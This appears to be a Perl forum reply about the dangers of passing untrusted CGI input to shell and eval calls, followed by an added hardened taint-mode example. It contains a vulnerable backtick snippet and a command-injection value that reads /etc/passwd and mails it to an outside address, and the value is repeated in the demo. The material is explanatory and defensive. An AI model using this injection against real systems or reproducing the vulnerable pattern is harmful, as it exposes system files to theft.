in reply to Security?
Bit like mounting a paper shredder in your letterbox as defence against junk mail! system and eval calls are some of the more obvious places that tainted or untrustworthy data can cause havoc. For example, if you were blindly running

    my $cmd = '/usr/bin/file ' . $q->param('object');
    my $mimetype = `$cmd`;

to check the mime type of a given object, of course some clown could then supply the object param as

    /my/dummy/object; cat /etc/passwd | mail crakd@your.boxen.com

Which would probably not give your script too much trouble, but possibly email /etc/passwd to somewhere it should not be.

Writing to a database without untainting input can also create grief; try removing an LDAP entry that has an equals sign '=' as the first character of its CN "accidentally" inserted.
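A hardened version of the file(1) lookup above, as an added example and not the poster's own code: the parameter is untainted against an explicit allow-list under -T, and file is started through the list form of open so no shell ever sees the value. The --brief and --mime-type options are real GNU file flags; the allowed character set and the helper names are assumptions for this example.

```perl
#!/usr/bin/perl -T
# Added example: validate a CGI-style parameter before handing it to file(1).
# Run as: perl -T this_script.pl   (taint mode must be on from the start)
use strict;
use warnings;

# Taint mode refuses to exec anything while PATH is untrusted, so pin it.
$ENV{PATH} = '/usr/bin:/bin';
delete @ENV{qw(IFS CDPATH ENV BASH_ENV)};

# Untaint: accept only a plain path of word chars, '.', '/' and '-'.
# Whitespace, ';', '|', backticks and friends are rejected outright, so
# the metacharacter trick from the post never gets near a shell.
# (The allowed character set is an assumption for this example.)
sub untaint_path {
    my ($raw) = @_;
    return unless defined $raw;
    return unless $raw =~ m{\A([\w./-]+)\z};      # capture group untaints
    my $path = $1;
    return if $path =~ m{(?:\A|/)\.\.(?:/|\z)};   # no '..' segments either
    return $path;
}

# Run file(1) without a shell: the list form of open passes argv directly,
# so $path is always one argument even if it contained spaces.
sub mime_type_of {
    my ($raw) = @_;
    my $path = untaint_path($raw);
    die "rejected object parameter\n" unless defined $path;
    # '--' stops file(1) treating a path beginning with '-' as an option.
    open(my $fh, '-|', '/usr/bin/file', '--brief', '--mime-type', '--', $path)
        or die "cannot run file: $!\n";
    my $mime = <$fh>;
    close $fh;
    chomp $mime if defined $mime;
    return $mime;
}

# Demo: a sane value is looked up, the post's injection attempt is refused.
for my $object ('/etc/hostname', '/my/dummy/object; cat /etc/passwd | mail x@y') {
    my $mime = eval { mime_type_of($object) };
    print "$object => ", (defined $mime ? $mime : "ERROR: $@"), "\n";
}
```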